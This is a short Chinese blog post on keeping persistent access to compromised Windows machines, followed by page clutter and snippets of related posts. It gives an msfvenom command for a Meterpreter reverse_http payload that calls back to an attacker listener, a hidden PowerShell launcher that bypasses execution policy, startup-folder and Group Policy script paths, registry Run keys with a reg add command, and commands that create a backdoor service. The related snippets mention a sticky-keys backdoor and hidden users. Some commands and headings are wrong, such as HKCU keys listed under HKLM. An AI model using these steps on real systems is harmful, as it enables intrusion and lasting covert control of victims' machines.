windows系统维权

最新推荐文章于 2024-06-15 17:27:28 发布
最新推荐文章于 2024-06-15 17:27:28 发布
阅读量105 收藏
点赞数
文章标签: 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45711054/article/details/132680966
版权

1、组策略开机启动脚本:生成一个powershell的木马:msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.52.130 lport=3333 -f psh -o shell.ps1

@echo off
powershell.exe ­-w hidden ­-ExecutionPolicy Bypass ­-NoExit ­-File C:\Users\Administart\Desktop\shell.ps1
exit


2、启动文件夹 里面的文件可以会在开机的时候自动启动。通过开始菜单——所有程序——启动 这个文件夹内,可以将程序开机自动启动
启动文件夹:
C: \ProgramData\Microsoft\Windows\Start Menu\Programs\Startup #系统级,需要system权限
C: \Users\用户名\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup #用户级普通权限

组策略脚本启动文件夹:
C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup
C:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown
C:\Windows\System32\GroupPolicy\User\Scripts\Logon
C:\Windows\System32\GroupPolicy\User\Scripts\Logoff


3、注册表
以下注册表路径都是注册表的启动项:
# HKEY_LOCAL_MACHINE类
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
# HKEY_CURRENT_USER类
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

使用reg add命令进行添加:
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v shell /t REG_SZ /d "C:\Users\Administart\Desktop\shell.exe"

重启win10机器,靶机上线

创建服务的方式:

sc create "test" binpath= "C:\Users\Administart\Desktop\shell.exe"    #创建服务
sc description "test" "test"        #设置服务的描述字符串
sc description "test" "test"           #设置这个服务为自动启动
net start "test"                       #启动服务


services.msc    #查看服务是否已经创建

夜雨清城丶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows权限维持
qq_40012781的博客
07-03 392
Windows权限维持
windows环境变量滥用维权/提权
qq_50854662的博客
09-14 325
windows环境变量滥用维权/提权
Windows系统利用5次shift维权漏洞复现
热门推荐
wangyuxiang946的博客
07-26 1万+
操作系统: Windows 7 旗舰版 工具: kali系统的msfconsole 5次shift维权原理 Windows系统中,5次shift键可以触发粘滞键,也就是C:\Windows\System32\sethc.exe,我们将cmd.exe改成sethc.exe并替换掉原来的粘滞键,就可以在登录界面通过5次shift键执行cmd,并且是system权限 除此以外,还可以使用其他工具替换sethc.exe 第一步,使用kali的msfconsole生成木马工具 1.开启MSF
使用msfconsole拿到win2008 R2的shell并进行维权二(权限维持)
X_xsj6的博客
08-11 484
使用msfconsole拿到win2008 R2的shell并进行维权二(权限维持) 四、维权后门 4.1查询服务器信息 4.1.1查看当前用户以及权限 4.1.2查看当前已有用户 4.1.3查看当前计算机名 4.2权限维护: 4.2.1创建账户(创建新用户的密码必须符合密码复杂度) 4.2.2将新建账户加入到管理员组 4.2.3开启靶机远程桌面功能 reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\...
Windows系统利用5次shift维权漏洞复现_连续按5次shift kali
2401_83974345的博客
04-18 301
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。将生成的木马工具上传到目标主机的c:/windows/system32目录下,并替换原有的sethc.exe。1.在目标主机按5次shift触发sethc.exe,没有任何反应,因为程序被替换了。2.查看kali的监听状态,输入 shell 可进入目标主机的命令行,并执行系统命令。2.设置反弹shell的位置( 自己的ip )因篇幅有限,仅展示部分资料。
关于我个人对Windows系统还是苹果系统那个更好的看法
qq_40183816的博客
04-22 2206
我觉得在系统方面Windows 我更加青睐,以下有多个观点我之列其中最重要的。 1.兼容性 2.普遍性 3.高度集成性 当然中国太极画的好,事情拥有两面性,他的优点也是他缺点的所在。 1.兼容性 你可以让windows装在很多平台上,发挥它的性能,但你没办法,让黑苹果装在任意机型上,很多人可能会说,这不是废话吗?不,并不是 如果你让Mac系统也可以装在别的机型上那么他也将是下一个windows。 2.普遍性 我不说我见过的,会电脑的你说谁没用过Windows,足以窥见Windows 的广泛。 3.高度集成性
windows创建隐藏用户及后门
diaobusi的博客
06-20 2168
Windows操作系统中,用户系统是用于管理和控制用户访问、权限和资源的一组功能和机制。以下是Windows用户系统的一些关键概念和组成部分:用户账户:Windows用户系统基于用户账户来管理用户访问和权限。每个用户都必须拥有一个唯一的用户账户,用户账户包含了用户的登录名和密码等信息。用户账户可以是本地账户(仅限于本地计算机)或域账户(属于域控制器管理的网络域)。
工商系统维权跟踪工作报告.docx
11-25
工商系统维权跟踪工作报告.docx
工会民主管理维权PPT模板下载
07-15
这是一套工会民主管理维权PPT模板,第一PPT模板网提供各类工会相关幻灯片模板免费下载; 关键词:动态PPT模板,工会管理PPT,工会维权PPT,红色PowerPoint模板免费下载,.PPTX格式;
聚焦315消费者维权知识讲座.pptx
03-06
聚焦315消费者维权知识讲座.pptx
知识产权系统执法维权专项行动实施方案.pdf
11-13
...
2022最新全新开发悬赏任务网赚系统手机APP源码带后台管理
04-11
置顶推荐,排行榜,红包大厅,红包抽奖,任务步骤,举报维权,vip会员特权等众多功能。。。 源码内有教程,本人亲测可用 以下两点源码里没有教程 我就在这里发出来了 运行目录选择:pubic 伪静态选择:thinkPHP ...
百度网盘限速解决办法
生活在别处
06-13 3654
比如可以获取下载直链后,使用IDM(Internet Download Manager)对该直链进行多线程下载,但是并不会有实际速率提升效果,因为百度网盘在服务器端进行了限速,多线程的速率总和被限制在了100KB/s左右。(现在虽然是所谓玩游戏获得会员下载体验,实际上点击后会在百度网盘内打开一个web游戏,并不需要游玩游戏,直接等待会员下载体验时间结束即可关闭web游戏窗口)所以,客户端这些改动伎俩通通没有实际效果,即使在客户端显示无限速、显示会员体验,都只是自欺欺人而已。
服务器远程桌面经常连接不上,造成远程桌面连接不上的原因都有哪些
最新发布
day3ZY的博客
06-15 415
防火墙和安全软件在保护服务器免受恶意攻击的同时,也可能误判正常的远程连接请求,导致连接被阻止。例如,如果远程桌面服务未启用,或者远程桌面端口被占用或配置错误,都可能导致连接失败。此外,如果服务器上安装了安全类软件,且未正确配置以允许远程桌面连接,也可能导致连接问题。例如,服务器可能遭受DDOS攻击,导致流量超出防御峰值,IP被封锁,进而无法远程连接。服务器远程桌面连接不稳定或经常连接不上是一个较为常见的技术问题,其可能的原因涉及多个层面,包括网络设置、服务器配置、系统安全等方面。
DELL服务器插入新磁盘、创建虚拟磁盘、挂载磁盘步骤
Clang’s Blog
06-15 544
分区磁盘 sudo fdisk /dev/sdb # 格式化分区 sudo mkfs.ext4 /dev/sdb1 # 创建挂载点 sudo mkdir /mnt/newdisk # 挂载分区 sudo mount /dev/sdb1 /mnt/newdisk # 编辑 fstab 以实现持久挂载 sudo nano /etc/fstab这样就可以将新磁盘(sdb)挂载到,并且每次重启后它都会自动挂载在那里。
计算机网络(6) ICMP协议
qq_42761215的博客
06-14 416
ICMP是网络通信中不可或缺的协议,虽然不传输用户数据,但在网络管理和诊断中起着重要作用。理解ICMP及其各种消息类型对于网络管理员和工程师来说是至关重要的,它有助于维护网络的正常运行和性能优化。
服务器权限管理
2302_80643218的博客
06-15 351
我们linux服务器上有严格的权限等级,如果权限过高导致误操作会增加服务器的风险。所以对于了解linux系统中的各种权限及要给用户,服务等分配合理的权限十分重要。(权限越大,责任越大)
Linux 常用命令 - userdel 【删除用户】
随便转转
06-12 133
userdel 这个命令源自于 “user delete”,即用户删除。这个命令主要用于在 Linux 系统中删除用户账户及其相关文件。当管理员需要移除一个用户及其在系统中的所有踪迹时,会用到这个命令。
getshell之后如何维权
04-30
如果您的网站被黑客攻击成功并且被入侵,您应该立即采取以下措施: 1. 立即停止服务器的所有服务,以防黑客继续攻击您的网站或服务器。 2. 收集黑客攻击的证据,包括入侵时间、攻击方式、攻击路径和攻击后的影响等信息。 3. 尽快通知您的网站托管或服务器提供商,并请求他们提供技术支持帮助您解决问题。 4. 与当地警方联系,报告黑客攻击事件,并提供证据。 5. 将您的网站恢复到正常状态,并采取措施防止类似的安全漏洞再次发生。您可以考虑更新所有软件和插件,加强安全设置,限制访问权限等措施来提高网站的安全性。 6. 如果您的网站涉及到用户信息泄露,您需要及时通知用户,并采取措施保护他们的个人信息。 这些措施可能需要技术专业人员的帮助,您可以寻求安全公司或专业团队的帮助来处理这种情况。同时,您也可以通过法律途径维权,例如起诉黑客攻击您的网站并索赔。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值